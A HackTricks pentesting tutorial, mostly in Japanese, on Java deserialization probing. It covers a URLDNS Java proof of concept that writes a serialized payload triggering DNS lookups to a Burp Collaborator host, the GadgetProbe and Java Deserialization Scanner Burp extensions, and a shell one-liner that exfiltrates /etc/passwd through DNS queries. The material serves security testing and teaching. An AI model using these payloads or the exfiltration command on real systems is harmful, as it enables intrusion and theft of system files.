12 KiB
Java DNS Deserialization, GadgetProbe and Java Deserialization Scanner
{% hint style="success" %}
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
デシリアライズにおけるDNSリクエスト
クラス java.net.URL は Serializable を実装しており、これはこのクラスがシリアライズ可能であることを意味します。
public final class URL implements java.io.Serializable {
このクラスには奇妙な動作があります。ドキュメントから:“2つのホストは、両方のホスト名が同じIPアドレスに解決できる場合、同等と見なされます”。
そのため、URLオブジェクトが**equalsまたはhashCodeのいずれかの関数を呼び出すたびに、IPアドレスを取得するためのDNSリクエストが送信**されます。
hashCode関数をURLオブジェクトから呼び出すのは非常に簡単で、このオブジェクトをデシリアライズされるHashMapに挿入するだけで済みます。これは、HashMapの**readObject関数の最後**でこのコードが実行されるためです:
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
[ ... ]
for (int i = 0; i < mappings; i++) {
[ ... ]
putVal(hash(key), key, value, false, false);
}
それはHashMap内のすべての値でputValを実行します。しかし、より重要なのは、すべての値でhashを呼び出すことです。これはhash関数のコードです:
static final int hash(Object key) {
int h;
return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);
}
ご覧のとおり、デシリアライズする際に**HashMapの関数hashはすべてのオブジェクトで実行され**、hashの実行中にオブジェクトの.hashCode()が実行されます。したがって、URLオブジェクトを含む****HashMapをデシリアライズすると、URLオブジェクトは**.hashCode()を実行します**。
次に、URLObject.hashCode()のコードを見てみましょう:
public synchronized int hashCode() {
if (hashCode != -1)
return hashCode;
hashCode = handler.hashCode(this);
return hashCode;
ご覧のとおり、`URLObject`が`.hashCode()`を実行すると、`hashCode(this)`と呼ばれます。この関数のコードは次のとおりです:
protected int hashCode(URL u) {
int h = 0;
// Generate the protocol part.
String protocol = u.getProtocol();
if (protocol != null)
h += protocol.hashCode();
// Generate the host part.
InetAddress addr = getHostAddress(u);
[ ... ]
getHostAddressがドメインに対して実行され、DNSクエリを発行します。
したがって、このクラスは悪用されてDNSクエリを発行し、デシリアライズが可能であることを示すため、または情報を抽出するために使用できます(コマンド実行の出力をサブドメインとして追加できます)。
URLDNSペイロードコードの例
ysoserialのURDNSペイロードコードはこちらで見つけることができます。ただし、理解しやすくするために、ysoserialのものを基にした独自のPoCを作成しました:
import java.io.File;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.InetAddress;
import java.net.URLConnection;
import java.net.URLStreamHandler;
import java.util.HashMap;
import java.net.URL;
public class URLDNS {
public static void GeneratePayload(Object instance, String file)
throws Exception {
//Serialize the constructed payload and write it to the file
File f = new File(file);
ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream(f));
out.writeObject(instance);
out.flush();
out.close();
}
public static void payloadTest(String file) throws Exception {
//Read the written payload and deserialize it
ObjectInputStream in = new ObjectInputStream(new FileInputStream(file));
Object obj = in.readObject();
System.out.println(obj);
in.close();
}
public static void main(final String[] args) throws Exception {
String url = "http://3tx71wjbze3ihjqej2tjw7284zapye.burpcollaborator.net";
HashMap ht = new HashMap(); // HashMap that will contain the URL
URLStreamHandler handler = new SilentURLStreamHandler();
URL u = new URL(null, url, handler); // URL to use as the Key
ht.put(u, url); //The value can be anything that is Serializable, URL as the key is what triggers the DNS lookup.
// During the put above, the URL's hashCode is calculated and cached.
// This resets that so the next time hashCode is called a DNS lookup will be triggered.
final Field field = u.getClass().getDeclaredField("hashCode");
field.setAccessible(true);
field.set(u, -1);
//Test the payloads
GeneratePayload(ht, "C:\\Users\\Public\\payload.serial");
}
}
class SilentURLStreamHandler extends URLStreamHandler {
protected URLConnection openConnection(URL u) throws IOException {
return null;
}
protected synchronized InetAddress getHostAddress(URL u) {
return null;
}
}
More information
- https://blog.paranoidsoftware.com/triggering-a-dns-lookup-using-java-deserialization/
- 元のアイデアでは、commons collectionsペイロードがDNSクエリを実行するように変更されましたが、これは提案された方法よりも信頼性が低かったです。しかし、こちらがその投稿です: https://www.gosecure.net/blog/2017/03/22/detecting-deserialization-bugs-with-dns-exfiltration/
GadgetProbe
GadgetProbeをBurp Suite App Store (Extender)からダウンロードできます。
GadgetProbeは、サーバーのJavaクラスにいくつかのJavaクラスが存在するかどうかを確認し、脆弱性があるかどうかを知ることができます。
どのように機能するか
GadgetProbeは、前のセクションのDNSペイロードを使用しますが、DNSクエリを実行する前に、任意のクラスをデシリアライズしようとします。もし任意のクラスが存在すれば、DNSクエリが送信され、GadgetProbeはこのクラスが存在することを記録します。もしDNSリクエストが送信されなければ、これは任意のクラスが正常にデシリアライズされなかったことを意味し、したがってそれは存在しないか、シリアライズ可能/悪用可能ではないということです。
GitHub内に、GadgetProbeにはいくつかのワードリストがあり、テスト用のJavaクラスが含まれています。
More Information
Java Deserialization Scanner
このスキャナーはBurp App Store (Extender)からダウンロードできます。
この拡張機能にはパッシブおよびアクティブな機能があります。
Passive
デフォルトでは、すべてのリクエストとレスポンスをパッシブにチェックし、Javaシリアライズマジックバイトを探し、見つかった場合は脆弱性警告を表示します:
Active
手動テスト
リクエストを選択し、右クリックしてSend request to DS - Manual Testingを選択します。
次に、Deserialization Scanner Tab --> _Manual testing tab_内で挿入ポイントを選択します。そしてテストを開始します(使用されるエンコーディングに応じて適切な攻撃を選択します)。
「手動テスト」と呼ばれていますが、かなり自動化されています。それは自動的にデシリアライズが任意のysoserialペイロードに脆弱であるかどうかをチェックし、ウェブサーバー上のライブラリを確認し、脆弱なものを強調表示します。脆弱なライブラリをチェックするために、Javas Sleeps、CPU消費によるスリープ、または前述のようにDNSを使用することを選択できます。
悪用
脆弱なライブラリを特定したら、リクエストを_Exploiting Tab_に送信できます。
このタブでは、再度注入ポイントを選択し、ペイロードを作成したい脆弱なライブラリとコマンドを記入します。次に、適切な攻撃ボタンを押します。
Java Deserialization DNS Exfil情報
ペイロードを次のように実行させます:
(i=0;tar zcf - /etc/passwd | xxd -p -c 31 | while read line; do host $line.$i.cl1k22spvdzcxdenxt5onx5id9je73.burpcollaborator.net;i=$((i+1)); done)
More Information
{% hint style="success" %}
AWSハッキングを学び、実践する:HackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践する:HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- サブスクリプションプランを確認してください!
- **💬 DiscordグループまたはTelegramグループに参加するか、Twitter 🐦 @hacktricks_liveをフォローしてください。
- HackTricksおよびHackTricks CloudのGitHubリポジトリにPRを提出してハッキングトリックを共有してください。